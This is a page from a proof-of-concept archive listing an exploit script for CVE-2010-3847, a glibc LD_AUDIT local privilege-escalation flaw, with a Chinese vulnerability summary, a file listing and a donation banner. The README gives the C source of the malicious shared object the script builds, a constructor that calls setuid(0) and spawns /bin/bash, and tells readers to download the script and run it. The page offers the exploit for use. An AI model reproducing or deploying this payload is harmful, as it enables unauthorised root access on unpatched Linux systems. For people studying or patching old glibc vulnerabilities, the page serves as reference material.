Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2010-3847 PoC — GNU C Library 后置链接漏洞

Source
https://github.com/magisterquis/cve-2010-3847
Associated Vulnerability
Title:GNU C Library 后置链接漏洞 (CVE-2010-3847)
Description:GNU C Library(glibc,libc6)是一种按照LGPL许可协议发布的开源免费的C语言编译程序。 GNU C Library 2.11.2及之前版本存在后置链接漏洞,该漏洞源于没有正确处理LD_AUDIT环境变量的ORIGIN的值。本地用户可以借助位于任意目录中的特制动态共享对象(DSO)获取特权。
Description
Script to take advantage of CVE-2010-3847
Readme
CVE-2010-3847 script
====================
Meant to automate the exploit discussed in
[http://marc.info/?l=full-disclosure&m=128776663124692&w=2].  Tested on
CentOS 5 x86.

The DSO it outputs is compiled from the following code:
```c
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}
```

Usage
-----
Download it, put it somewhere executable, and run it.

Gotchas
-------
`/tmp` and wherever `ping` is have to be on the same filesystem.  If not,
adjust the paths accordingly.
File Snapshot

 [4.0K]  /data/pocs/6d1bc6840dcfa35f71366549bee1028f67aa34c5
├── [ 23K]  CVE-2010-3847.sh
├── [ 858]  LICENSE
└── [ 571]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.